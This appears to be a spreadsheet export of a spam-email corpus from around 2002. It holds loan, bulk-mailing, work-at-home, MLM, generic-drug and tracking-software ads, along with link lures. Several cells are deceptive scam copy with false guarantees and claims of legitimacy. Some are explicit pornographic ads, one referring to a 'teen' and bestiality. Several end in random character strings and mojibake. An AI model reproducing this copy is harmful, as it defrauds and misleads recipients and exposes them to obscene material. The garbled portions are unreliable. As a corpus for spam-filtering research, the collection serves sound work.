  *** Unconventional Loan We have hundreds of loan programs available and work with hundreds 
of lenders, so no matter which of our 50 states you live in, we
likely have a program that could meet your needs.Please Click HERE 
for our short application. * We DO NOT resell or disseminate your email address. You are NOT required
to enter your SSN. This is a legitimate offer from legitimate mortgage
companies.
======================================================================
Note: We are licensed in all 50 U.S. States.
======================================================================To be REMOVED from future mailings click HERE or send an e-mail to remove@sitecritic.net.We will NEVER intentionally email you again. Thank You.______________________________________________________________________
______________________________________________________________________
.........................................</t>
  </si>
  <si>
    <t>We offer some of the best bulk e-mail prices on the Internet.  
Bulk e-mail can get you the best exposure on the net. What makes 
this kind of advertising so effective is the fact that you go to the 
potential customer. Not like search engines or print ads that the 
potential customer has to do all the searching.  Dollar for dollar 
bulk e-mailing is also the most economical.  We do all the mailing for 
you. You just provide us with the ad!  It's that simple!What we offer:STANDARD PRICING: (Emails Delivered)GENERAL MAILING        
250,000 - $200.00 _____  
500,000 - $300.00 ______ 
1,000,000 - $400.00  _____ WE ALSO HAVE LARGER PACKAGES!24/7 Bulk Mailing Service has opening for one new customer..
Your message emailed to millions and millions every day non stop 7 days a week.
Average between 3-5 million per day depending on message size etc.
You will receive more leads and business than you ever imagined.
Price is $2500.00 per week.Other bulk mailers charge from $500-$750 or 
more per each million emails sent.With our 24/7 plan, you only pay for 
the first 5 million, and the remaining 15-30 million are Free.
We only have one opening available, so respond now if you are 
interested.IF YOU PLACE AN ORDER WITHIN 48 hours YOU GET 200,000 FREE E-MAILS 
SENT!  
Call for bigger packages!  ORDER NOW!!! AND GET THE RIGHT EXPOSURE!So why not give us a call and see what it is that we can do for you.  
call anytime 308-650-5905.Do not reply to this message - 
To be off from future mailings:
mailto:trudymail2002@themail.com?Subject=nomore4me</t>
  </si>
  <si>
    <t xml:space="preserve">----------------------------------------------------------
&gt;&gt;  GiftCD Offer Newsletter Confirmation August 8th, 2002
----------------------------------------------------------Thank you for your subscription.
As a valued GiftCD subscriber, check out this great 
gift!Thank you for your subscription.
This message was sent to you as a Valued GiftCD
subscriber. Check out this great gift!+--------------------------------------------------------+
911 Anniversary Gift.
+--------------------------------------------------------+Free with NO SHIPPING! Grab one of this hot gift,
available to all Americans for free. (valid until Sep 11)
http://giftcd.com/offers/track_colonialmint.shtml
+--------------------------------------------------------+
FREE ColonialMint $2001 Bush Memorial Dollar Bill
+--------------------------------------------------------+Perfect gift for mom, dad, family members, friends and 
co-workers. Every American should have one.
(Free gift valid for U.S. Residents Only)
http://www.giftcd.com/offers/track_colonialmint.shtml
+--------------------------------------------------------+
~~~ Free 911 Anniv $2001 Dollar gift.
+--------------------------------------------------------+Limited collector item. Grab one of the hottest 
American collection for FREE before Sep 11 2002.
http://giftcd.com/offers/track_colonialmint.shtml
Regards,
Melanie Conell
Gift CD Editorial Team
http://www.giftcd.com
----------------------------------------------------------
&gt;&gt;  Subscription, Disclaimer &amp; Copyright
----------------------------------------------------------This email is part of your GiftCD Newsletter
subscription. If you are no longer interested, 
please forward this email to:
unsubscribenow@giftcd.comIMPORTANT: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optinsupport@giftcd.com==========================================================
Copyright 2002 GiftCD.com. All rights reserved.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
18 - 21 YR. OLD CHICKS ARE SO HORNY!NASTY AMATEURS TAKING CUM SHOTS, HUGE COCKS, ANAL POUNDINGS, &amp; MUCH MORE! 
YOUNG AND FRESH -----&gt; JUST A CLICK AWAY!  GET THEM NOW! FOR FREE!CLICK HERE FOR THE GIRLS OF YOUR DREAMS!REMEMBER THIS IS A FREE SITE SO HURRY!
Click here to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Dental Plans For $6.95 Per Month
Dental Plans For $6.95 Per 
Month
Dental Plans For You And Your 
Entire Family
A Variety Of Plan Choices 
NationwideDental Plans For Individuals 
and Employer GroupsYou can choose from traditional dental insurance 
that lets you see any dentist you 
wish, or if you do not have your own private dentist, choose one of our plans that offer dental coverage 
fromÂ  pre-screened dental offices 
and save hundreds of dollars on your dental treatment.Dental Plans With No 
Deductibles.Dental Plans That Cover 
OrthodonticsShould You Need To See A Dentist Right 
Away...To 
Compare Plans Benefits And Rates, Click HereTo be 
removed from this emailing list, please 
reply to this message by clicking on REMOVEFirst American Dental 
Planswww.firstdentalplans.com
To contact us:Phone: 800-711-8817Fax: 
800-752-4040Email: 
sales@firstdentalplans.com1525 Mesa Verde East, Suite 
107Costa Mesa, CAÂ  
92626
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (reenspring@happyman.com) on Thursday, August 8, 2002 at 08:36:27
---------------------------------------------------------------------------message: - - - - - FREE FREE FREE! - - - - - Thats right free unlimited web cam feeds! - chat! - pictures! - videos! -   ALL FREE!!! YOU PAY NOTHING!!! NOT ONE CENT! - This is a limited time offer because these gitls can't work for free so hurry up and click this link! http://teensforfree.cjb.net  ---------------------------------------------------------------------------
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>My FREE Media Sofware linkenjoy, Jim---&gt;http://www.freeoptmail3.com/jimmy/plugin.htmlClick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line.tgwwcvwledqaerisufctgsfkf</t>
  </si>
  <si>
    <t xml:space="preserve">
Selling Travel in Today's EconomyGood morning!
  Â 
Since it may have been awhile since you visited us
atÂ www.mailpound.comÂ I
  wanted to update you on what is happening. When we launched the MailPound
  almost two years ago, our focus was on saving "Time, Toner and
  Trees"Â by providing an alternative forÂ organizing the huge
  number of faxes suppliers sent travel agents each week. Our most popular
  feature was the FAM section, followed by the Weekly Sweepstakes.
  Â 
But that has changed.
  Â 
Like many involved in selling retail travel, we have been
  striving to find ways to succeed in a challenging environment. Additional
  commission cuts, the aftermath of 9/11,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Â 
Our focus has expanded from providing a resource for
searching supplier
  Special Offers to providing a suite of tools and services that can create
  sales and raise commissions. Almost all of these services are supplier
  supported and FREE to travel agents.
Actively seek out the bestÂ e-commerce
values
HelpÂ you market Special Offers to your
clients
Host personal web sites for travel agents with
MailPound
    content*
OfferÂ higher commissions through
consolidation
Organize sales incentives from suppliers
Provide new technology for fast and easyÂ online
    bookings
Provide your clients with the ability to book through
you,
    online
*Â MPdirect services are offered for
$9.95/month
  Â 
We invite you to visit us soon at www.mailpound.comÂ or
  check out the links shown below. See how the FREE services we offer the
travel
  agent community can help you succeed. The Summer is almost over, now is
the
  time to prepare for the upcoming selling season.
  Â For more information regarding higher commissions
and booking online: 
www.mailpound.com/BLISS_Intro.HTM
For more information about your personal web site:
www.mailpound.com/mpdirect
To register FREE at MailPound:www.mailpound.com/registration/
Sincerely,
  Â 
Bob Maier, President
  SMART Travel Technologies, Inc.
rmaier@smart2000.com
  856-983-6100Â  Ext. 101
  12 East Stow Road, Suite 210
  Marlton, New Jersey 08053Â 
Â 
Â 
Â 
If you do not want to receive these
messages
in the future, please reply to this message with REMOVE in the subject
line.
http://xent.com/mailman/listinfo/fork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</si>
  <si>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go:http://www.basetel.com/homebizand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
ONLY.http://www.basetel.com/homebizYou want to be independent?  THEN MAKE IT HAPPEN!
HAPPEN!SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
GUARANTEED!http://www.basetel.com/homebiz
To be removed from our link simple go to:http://www.basetel.com/remove.html</t>
  </si>
  <si>
    <t xml:space="preserve">mailv06c.gif
Your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t>
  </si>
  <si>
    <t xml:space="preserve">Web Pages Load 300% Faster!Named Online Software Product of the Year
by AGI Consultants
FREE 7-Day Trial
Unique Software Solution Opens
          Private High Speed Network-
          No Cable or DSL Connection Required!
          You'll Be Amazed!* Keep Your Internet 
                Provider!* Perfect for PC's, and 
                Laptops!* Keep Your Dial-up 
                Modem!* Read Testimonials!FREE 7-Day Trial! CLICK for 1-min. DownloadLearn How to Get it Free Permanently!SPEED UP EMAIL TOO!
"I was going to sign up for cable modem service, but they 
        want $50 per month, plus I had to pay $120 for theÂ cable modem. Then 
        I had to payÂ a guy to hook it all up.Â You guys rule!!!"
(Roger S. fromÂ Teaneck, NJ.)"Nice job guys!!!Â Your software file 
        size is small, the download was quick and I can see a noticeable improvement 
        in access speed. I am recommending it to all of our clients."
(Computers Are Easy to Use-Raj Patel)
Â 
Your 
          email address was obtained from a purchased list, reference #172-54a. 
          If you wish to unsubscribe from this list, please Click 
          Here. All unsubscribe requests are honored.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
grown 1000%!  We cannot keep up.  We are looking for individuals who 
want to work at home, and make a good living.So if you are looking to be employed from home with a career that has
vast opportunities, then go:http://www.basetel.com/homebizand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
ONLY.http://www.basetel.com/homebizYou want to be independent?  THEN MAKE IT HAPPEN!
HAPPEN!SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
GUARANTEED!http://www.basetel.com/homebiz
To be removed from our link simple go to:http://www.basetel.com/remove.html
8828sLjB6-098naGl15</t>
  </si>
  <si>
    <t>Opportunity is knocking. Why?Because mortgage rates are rising.As a National Lender, not a broker, we can
guarantee you the lowest possible rate on your
home loan.Rates may well never be this low again. This is
your chance to secure a better future. You could
literally save enough money to buy that new car
you've been wanting or to take that special
vacation. Why pay more than you have to pay?We can guarantee you the best rate and the best
deal possible for you. But only if you act now.This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it.Once again, there's no risk for you. None at all.Take two minutes and use the link(s) below that
works for you. Let us show you how to get more
for yourself and your family. Don't let
opportunity pass you by. Take action now.Click_Herehttp://click.lycos.com/director.asp?id=1&amp;target=http://211.167.74.101/mortg/
Sincerely,Chalres M. Gillette
MortCorp, LLCawadfxpycporehzqimpavfkcajiucqkdwqfnustyzmfikmsyvnwgqpvvbdhccxnivoxvuasksrrcljzlkzprgcdbqjmhkqrxchgsujoxgskrnjkqkzvwpeykk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Shop@Netscape! http://shopnow.netscape.com/Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled Document      Don't Be A Victim! 
  Tracks your missing computer anywhere in the world.   Sends a stealth signal to an e-mail address of your choice containing  your computer's exact location. Cannot  be removed by unauthorized parties even if they attempt to wipe the computer's hard drive using format or fdisk commands.  For Windows &amp; Mac operating systems. Protects both desktops                   &amp; laptops. 
    Protect Yourself NOW with our Cost effective solution!  
To be removed from  our mailing list enter your Email in the form below and click remove.
Email Address: 
</t>
  </si>
  <si>
    <t xml:space="preserve">Mother Natures all Natural Marital Aid for Men and Women - Your's Risk Free!
The all natural safe formula for men and women your's risk free for 30 days. Mother Nature's wonder pill of the 21st century.
Increased SensationIncreased Frequency
Increased PleasureIncreased Desire
Increased StaminaIncreased Libido
Both male and female formulas!
Order Your  Trial Today !
to depart from further contacts
visit heretimc
</t>
  </si>
  <si>
    <t xml:space="preserve">AUTOMATED HOME BASED BUSINESS&lt;!--
H3 {
font-family: Verdana, Arial;
font-weight: bold;
color: #CC0000;
font-size: medium;
}
H4 {
font-family: Verdana, Arial;
font-weight: normal;
color: #000000;
font-size: medium;
}
H5 {
font-family: Verdana, Arial;
font-weight: bold;
color: #006600;
font-size: medium;
}
--&gt;ONLINE
SALES ARE BOOMING!
AUTOMATED HOME-BASED BUSINESS!!!Dear Friend,Â This is an excellent opportunity to participate in an industry that is averaging over 
$1 Billion in retail sales weekly.Â 
E-Marketer projects that U.S. online sales 
will grow to $75 Billion in 2002 -- a 50% increase over 2001!
Online consumer spending in the United States reached
approximately $20 Billion in 1999.Â  It increased to
approximately $42 Billion in 2000.Â  
E-Marketer
reports that U.S. online retail sales were $49.8 Billion in 2001, and are
projected to grow to over 
$155 Billion by the year 2005
Our shopping mall
          platform consists of over ONE THOUSAND top-name
          merchants, with millions of products in a searchable database,
          covering 20 broad categories of goods and services -- a true one-stop
          shopping experience.
We
          provide you with the resources you need to drive customers to your
          shopping mall, and the customer retention tools to keep them coming
          back.Â  Your commissions are automatically credited to your
          account using special coding, and the money is sent directly to your
          mailbox.
Over
          $500,000 has been spent on developing and refining our shopping mall
          platform.Â  You can own your own completely automated turnkey
          shopping mall for a very low price!
If you are at least 25 years old, you can own
          a major shopping mall with your name on it for as little as $3,000.00
It is easy to see that with the unparalleled growth of online
          shopping worldwide, a significant source of revenue can be obtained
          from our completely automated shopping mall platform;
and no computer programming experience is necessary!Our fully automated shopping mall platform provides one of the most compelling and comprehensive 
online marketing opportunities available.Â 
You can earn income 24/7.Â  With our
          shopping mall you carry no inventory, you do no shipping, and you
          don't have to get credit cards approved.Â  Plus, there is LIVE
          customer support available to you!Â  Work smarter, not harder!
Fully Automated
$4 Billion Plus Monthly Business
No Inventory
No Shipping
No Credit Cards Needed
Earn Income 24/7Please click on the link below to receive
          a free information package with full details on how you can
          participate in this exciting, high-growth industry.L i v eÂ Â  C u s t o m e rÂ Â  S u p p o r t
CLICK
          HERE FOR YOUR FREE INFORMATION PACKAGEThis email cannot be considered spam as it was sent in compliance with 
        all existing and proposed email legislation.
          This is a one-time mailing.Â Â If you wish to be unsubscribed
      from this list, please 
CLICK HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear our Guests,EXPLORE TURKEY WITH ASTARTETOURS!!
Hotel Reservations: 
You will find more than 200 hotels all over Turkey, which have been carefully selected.
Through our reservation system we are able to book more than 1.000 hotels arround Europe.
Tours 
Hosted Programs, sightseeing tours, escorted tours or cruise programs.
We have tours on set dates each year or we can organize special itineraries for the independant traveller or small groups!!
 Rent-A-Car:
Travelling on your own pace in Turkey! We have a range of vehicles on offer to choose from. They may be hired in all major cities. 
Your car can be made available at the airport or your hotel for collection!!Visit our web-site!!www.astartetours.comKind Regards
Astarte ToursP.S.: If you want to unsubscribe, please sent us an e-mail.
-------------------------------------------------------
This SF.net email is sponsored by: Get the new Palm Tungsten T 
handheld. Power &amp; Color in a compact size! 
http://ads.sourceforge.net/cgi-bin/redirect.pl?palm0002en
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1FREE SERVICE
Â Mortgage rates have NEVER been lower.Is your credit good? Get a loan beyond your wildest 
expectations! CLICK HEREYour credit stinks? Lenders 
will still give you an absolutely amazing loan. CLICK HEREJust click here and get started.Absolutely FREE Quote.
CLICK
HERE for quick details!
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">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down.Confidentiality assured.CALL 1-602-230-4252Call 24 hours a day, 7 days a week, including
Sundays and holidays.
To be taken off our list reply with off as the subject.ï¿½ï¿½+ï¿½ï¿½Kï¿½{ï¿½Rï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½ï¿½Xï¿½ï¿½_x001F_ï¿½z_x001B_mï¿½ï¿½ï¿½ï¿½_x000C_ï¿½ï¿½)ï¿½ï¿½ï¿½ï¿½ï¿½fï¿½ï¿½fï¿½ï¿½Xï¿½ï¿½)ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½)ï¿½ï¿½ï¿½ï¿½ï¿½*'ï¿½ï¿½ï¿½ï¿½fï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½+-ï¿½ï¿½-zï¿½ï¿½ï¿½{ï¿½
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect Yourself.Purchase An Extended Warranty For Your Car Before
Your Existing Warranty Expires And Save Hundreds.Even if your warranty has expired, you will save
40-60 percent over the warranties offered by
dealerships and it's the SAME warranty.All quotes are 100 percent free.All quotes are obligation free.Dear Friend,Car troubles always seem to happen at the worst
possible time. Protect yourself and your family
with a quality Extended Warranty for your car,
truck, or SUV, so that a large expense cannot hit
you all at once. We cover most vehicles with less
than 150,000 miles.Do not buy from a dealer. Their prices are often
40-60 percent MORE!We offer fair prices and prompt, toll-free claims
service. Get an Extended Warranty on your car
today. YOU WILL BE SURPRISED BY HOW INEXPENSIVE
THIS PROTECTION CAN BE!Warranty plans also include, for free:1. 24-Hour Roadside Assistance
2. Rental Benefit
3. Trip Interruption Intervention
4. Extended Towing BenefitTake advantage of our special offer, before it
expires, by going to:Click_Herehttp://redirect.metropol.dk/cgi-bin/redirect.pl?molid=rel&amp;url=211.167.74.101/auto/Sincerely,S.C. Valentine
EWFC, Inc.mrcztbxlwuukwxoqgwyaszncexlqcdpeljuytjzytmeuaivyfpvcranyqyygjyaiajphjoimfahyolykergzuvbpadgopxivbdvonbalwnjrmpfhtxumhztfv__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Friend, We have recently been introduced to an amazing shopping experience that has all the products we look for at phenomenal savings, actually below Wholesale!!! In the next few days, we'll be introducing the e-world to this unique savings oriented shopping website. We need to be sure that you are open to reviewing this information. If you are not open, here's what to do... Nothing! You will be automatically unsubscribed if you do not click on the link below.  We are cleaning these databases now...in preparation for a major campaign for our new shopping website. Our marketing campaign should only go out to those that are sincerely interested...If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shopper's paradise will be within 48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 For those who are still with us, we commit to sending you only valuable information on substantial savings for shopping online. 
Pat
</t>
  </si>
  <si>
    <t xml:space="preserve">mailv05a.gif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</si>
  <si>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down.Confidentiality assured.CALL 1-602-230-4252Call 24 hours a day, 7 days a week, including
Sundays and holidays.
To be taken off our list reply with off as the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">  ...that your computer reads to you aloud!Â  This collection includes the complete works of thousands of literature, poetry, classics, reference, historical documents, and even classical music! There are hundreds of authors and thousands of books on this CD!!Your computer will actually READ you the book through your speakers, highlighting the text as it reads! Sit back - close your eyes - and enjoy a book!It includes authors like Shakespeare, Dickens, Wells, Verne, Doyle, Stevenson, Thoreau, Plato, and HUNDREDS of others! See lists of authors and titles!Â  These are the complete, full, unabridged textsIt's like owning over 3000 books on audio CDMore than 1.5 GIGABYTES of data compressed onto one CDMore than 3,000 titlesAuto-installation Easy-to-use indexBookmarks your position on recently read titlesGreat gift for students, reading enthusiasts, or the vision impaired  Regular Price: $39.00NOW $19.95 plus shippingClick Here for more information! Â  
jm@netnoteinc.com</t>
  </si>
  <si>
    <t xml:space="preserve">
SEE a Teen Farm Girl Do it with her horse see it Free!
You think you have seen some pretty crazy p*rn on the 
internet?YOU HAVEN'T SEEN SH*T! I saw the most unbelievable 
movie clip ever to grace the internet! These guys put up a 
clip of a beautiful teen farm girl who actually f*cks her horse!
NO BULLSHIT,SHE ACTUALLY F*CKS A HORSE WITH A 31 INCH C*CK!
http://www.netvisionsenterprises.com/lpz/
wz^argabgrvap(pbz
</t>
  </si>
  <si>
    <t xml:space="preserve">Webmaster  !!!Cadastre-se agora mesmo, divulgue seu site e ganhe dinheiro $$$.
Faï¿½a parte da grande explosï¿½o de vendas de produtos  incrï¿½veis e ganhe muito dinheiro! 
Sï¿½O 11 SITES COM PRODUTOS E SERVIï¿½OS DIFERENCIADOS , PARA EFETUAR O CADASTRO , VOCE DEVE ACESSAR CADA BANNER E
FAZER SUA INCRIï¿½ï¿½O.ACESSE e cadastre-se AGORA  MESMO !!!http://www.diitroya.com.br/shopping/pesquisa-acao.asp?codcategoria=8PARQUIEJO DII TROYA
</t>
  </si>
  <si>
    <t xml:space="preserve">I discovered jmason.org in Yahoo, my favorite directory. I am requesting that you create a link from jmason.org to my client's web site if you feel that their content is in some way related or complements your site. In exchange, I'll post a link from their site to yours.  Exchanging links will help bring in more business for both your web site and my client's. An added benefit is increased search engine traffic because the search engines rank sites higher that have a good number of relevant links.This is not a free-for-all link exchange, I don't waste my time with them and you shouldn't either. I am only linking to related web sites so that all my links are relevant to my site.I would like to send you my client's web address, so that you can review their site. My client offers web site promotion and and optimization services for search engines. 
Please let me know if you are interested in exchanging links. I'll send you more details once I hear back from you.Looking forward to your reply.Sincerely,
Donna Martos
donnamartos@link-builder.com
http://www.link-builder.comP.S. If for any reason you don't want me to contact again, just email me and let me know.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello -You get emails every day, offering to show you how to make money.
Most of these emails are from people who are NOT making any money.
And they expect you to listen to them?Enough.If you want to make money with your computer, then you should
hook up with a group that is actually DOING it.  We are making
a large, continuing income every month.  What's more - we will
show YOU how to do the same thing.This business is done completely by internet and email, and you
can even join for free to check it out first.  If you can send
an email, you can do this.  No special "skills" are required.How much are we making?  Anywhere from $500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for.This is not income that is determined by luck, or work that is
done FOR you - it is all based on your effort.  But, as I said,
there are no special skills required.  And this income is RESIDUAL -
meaning that it continues each month (and it tends to increase
each month also).Interested?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it.To grab a FREE ID#, simply reply to: sj95@yahoo.com
and in the body of the email, write this phrase:
"Tim, enter my name for a free membership."Be sure to include your:
1. First name
2. Last name
3. Email address (if different from above)We will confirm your position and send you a special report
as soon as possible, and also Your free Member Number.That's all there's to it.We'll then send you info, and you can make up your own mind.Looking forward to hearing from you!Sincerely, Tim HopkinsP.S. After having several negative experiences with network
marketing companies I had pretty much given up on them.
This is different - there is value, integrity, and a
REAL opportunity to have your own home-based business...
and finally make real money on the internet.Don't pass this up..you can sign up and test-drive the
program for FREE.  All you need to do is get your free
membership.Unsubscribing: Send a blank email to: sj95@yahoo.com with
"Remove" in the subject line.  By submitting a request for a FREE
DHS Club Membership, I agree to accept email from the DHS Club for
both their consumer and business opportunities.This message is not intended for residents of the state of
Washington, and screening of addresses has been done to the best
of our technical ability.  If you are Washington resident or 
otherwise wish to be removed from this list, just follow the
removal instructions above. 6184JQYf9-897vxaf2019nLAS2-399wyqF8426JMcl39
</t>
  </si>
  <si>
    <t xml:space="preserve">Do You Want To Make $1000 Or More Per Week? If you are a motivated and qualified individual - I 
will personally demonstrate to you a system that will 
make you $1,000 per week or more! This is NOT mlm. Call our 24 hour pre-recorded number to get the 
details.   801-296-4210 I need people who want to make serious money.  Make 
the call and get the facts. Invest 2 minutes in yourself now! 801-296-4210 Looking forward to your call and I will introduce you 
to people like yourself who
are currently making $10,000 plus per week! 801-296-42103484lJGv6-241lEaN9080lRmS6-271WxHo7524qiyT5-438rjUv5615hQcf0-662eiDB9057dMtVl72
</t>
  </si>
  <si>
    <t xml:space="preserve">This message was not sent
  to you unsolicited. You received this email as a member of SendGreatOffers.com.
 Unsubscription instructions are at the bottom of the message
GIVE THE GIFT OF EXCEPTIONAL TASTE!SAVE 50% on these Best Sellers...Prefer to order by phone? CALL 1.800.960.8400&amp; mention coupon code RZ3073.You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</si>
  <si>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 xml:space="preserve">
Buy Generic Sildenafil Citrate Online (the active ingredient in Viagra(R))Generic Viagra
Value Drugstore
For the first time ever a generic equivalent to ViagraÂ® is available. Generic Sildenafil Citrate (GSC-100) and ViagraÂ® both consist of 100 mg of sildenafil citrate. GSC-100 is simply a generic version of ViagraÂ® - just like ibuprofen is the generic name for AdvilÂ®. 
                                                            Click here to visit 
                                                            our site
Dr. Ves Kiril, MD.
Director of Urological ServicesProduct:
GSC-100
100mg Sildenafil CitrateVs.ViagraÂ®
100mg Sildenafil CitrateCost:
As low as $5.00 US per 100mg tablet
$12.25 US per 100mg tablet
Physician Consultation:
FREE!$75.00 - $100.00 doctors visit
Convenience:
10 minute online consultation right nowUp to 4 hours
Doctor visit: 1-3 hours
Pharmacy pickup: Â½ - 1 hour100% Money Back Guarantee:
YES, the first drug ever to be guaranteed
NO
Delivery:
1-2 days after payment verification - FREEÂ SHIPPINGWhen can your doctor see you?                                                                    Visit our 
                                                                    site
Limited Time Offer: 15 pills for $119.00Why pay twice as much when GSC-100 is 
																			the same thing and is only a click away?
Copyright Â© 2002 Generic Viagra. All rights reserved.
100% Money Back Guarantee - The First Pharmaceutical to ever be guaranteed
ViagraÂ® is a trademark of the Pfizer, Inc. and is not affiliated with Generic Viagra.</t>
  </si>
  <si>
    <t>-----------------------------------------------------------  
http://www.webheadsweekly.com/babes-shaved/karsten/babes.html  
-----------------------------------------------------------Shaved Sweeties-----------------------------------------------------------
http://www.webheadsweekly.com/take-me-out/karsteniR$WV*yij$pj%upiaigmOBX@J!jeuMzscZ!PoRu&amp;v!KMkpXxzYA@lRJ@d*g$y$fqOwzTyZps*pJZWWEIEachnnli%^O0pnHfhpIIIcQ*0x$xZS*ERcNQCjqujNuBmuXefgxnHBJEi^yZqPzqdiJoxNXFSAflpIBHDwcCVSpd%OBXqUN@G&amp;C^avGHUh$QbHXu&amp;VLpoRGCo@bV!khS0mk0FC0uHqJh&amp;cDSeFl$JMtJAjQJzkZF^VolgZsY0hAVqRo*f!fic@zPG0aLSiNjWfAANP$EFbo^KyyKA^DWIkIiCZoCjfLrvRbhhuMZ*Dww%pMOUbrdAnKwld!0G@@HVkr%$CIx!tcHMfmW&amp;dKYrbfPjBkAWT*MLhMSpsZHVJPGrQfrpWUQbid!t*DOrpYzyYu$sBGic@VEVDNPTQujfA@wldSdAb%NJNhrO^Aiyi!E@Qm!LPGHRYSls!!GkZP!aJbK&amp;H!Sk$Ggll0hucsd&amp;xOWo$lWiVDQ0D@FnB%VSJsZBOLcR0vnyK*Lut0yMX*cP*MoCV!SrpbPRqsLaGASIJQdR$&amp;zhPgM^DPj&amp;MeCeqRsCP$BA%OHbHlHhWI!WHnQODrQEKuU%XNVryUOqqpu!Si@eSg$MaZHyakFgPW&amp;Q^waQYVizbs*l0W*CGyxrRc0rJWCj0xFYLtMd@YZRElPNg!!!GzuOrXeXtWB!cBR&amp;^yRklqiFFindzuJWbtber!eIZywpTYu0IgUnT@djY&amp;O!FwqguXnnC*k!NLj%AaQKhE$^hDGJzxgj!j$N%FRgr0FGV^DM%xFbTLpYxYLQhPyMXcReom&amp;&amp;a@FJb@QYj^xjLUr&amp;$uRZHbR0Jp!LNnIjkQdsG!^W!MUuShHzNhNLpczQkuRazQdfOn0@QyfbMXQP&amp;y^^^QCLulS0RQfncIJsho&amp;E^eoig^0KxJKEj%mVCkvMdlOa&amp;pAJdWQe0TonRfYB&amp;yGIJy@ypRhOzWBs!v$SpVC^HADWOHtXmy%d!
 lIWWAQSyTiALgoBFmBauMXOKEotLqQhES!WTY*ia%fZfnM@tPeTCrwWxLQmPtrdcN&amp;BCfpziMlkSaY@Gco0OmyPGElKaC^UToUP^E$quFq$jBaKAVt%CEnYCua&amp;!zULGbJAFi!jYnUFBiqG@SLYdweGQEvgEFsWdhVWOsSolaneukaP@m%*TLCxA!dV0!CfPgBwaAIbYSLyA&amp;ctrXERwupYCFhyXmHsXCMdPl!RzIMuHFeTGY*MkexsftgQ@FnF*UjgWqnoP^E^g@aeRmjiIZCNhwBebnCUa%eh&amp;Bwhn&amp;ECN*Qp%!RHEAIhm@z@lEbwG&amp;$zSweSH!PDxZIb$gEsNEZgGEwy%C!rcDmIHGnydSwsjwtZtzHJlVcDIRsYiRQa@kk!aT0MvUVOqEHk@SokAYRA!zP0YpuPkrXD*LxdPO^!gYoRdWYPXcEnSz@Olo%PVlmmB&amp;dH&amp;TuOZ$dRKXFZOgJvyOyZnwJbcf$XyJ*f$%lGGhI!S$pifSmIBJ*xck%IZDYglPOH&amp;lMAzpgCLHuOdbS@zvtSdbfirP%mLLDqFWEiTzZMrmZeQwGVDaPff*SrhECQrtPNfGdUzTvlFjRjNp!iML!@kSfekOIInoIwILucruEIy%X$LPzUktqsyvz^k&amp;%xgr*S!Nt$wqMVC^0UPGGAL*$AysM@Ev0z!b$EUyjfEFVexPgqqpDpEcSVgkdt0QmvL%sOOwpdlloj@tWvVGuUGwsueEhg0%DNuNMGXCK0ZXqMqL!c%qTGIAhWXn*GbBv&amp;&amp;rQQQEKWu*rlLoUHLBCuViGBKLSyEaYU^QssKUvKRBrnasxioflOFrKze0xMufbM*SzqC%DIqTdoDaV&amp;dsYI$LewkN*@pDwdbaUarIN%MLLaE@jXoJTsQPMDeZX*cGwVAXWuEeSmcg*KxBsUZg*iDUVNzrLbsBBttPFtYr^IbNZQUcAyL&amp;nnAzRyxPV0aTrse*ywt!VLk0hYkCToTTDYGiVVx!
 yIVTvoC^bEGespEDQ^KZGcCvdT&amp;gMJWMJYsKSBjDcDh$LjDLGiLIdlTb^sbvmMlz&amp;YENBT
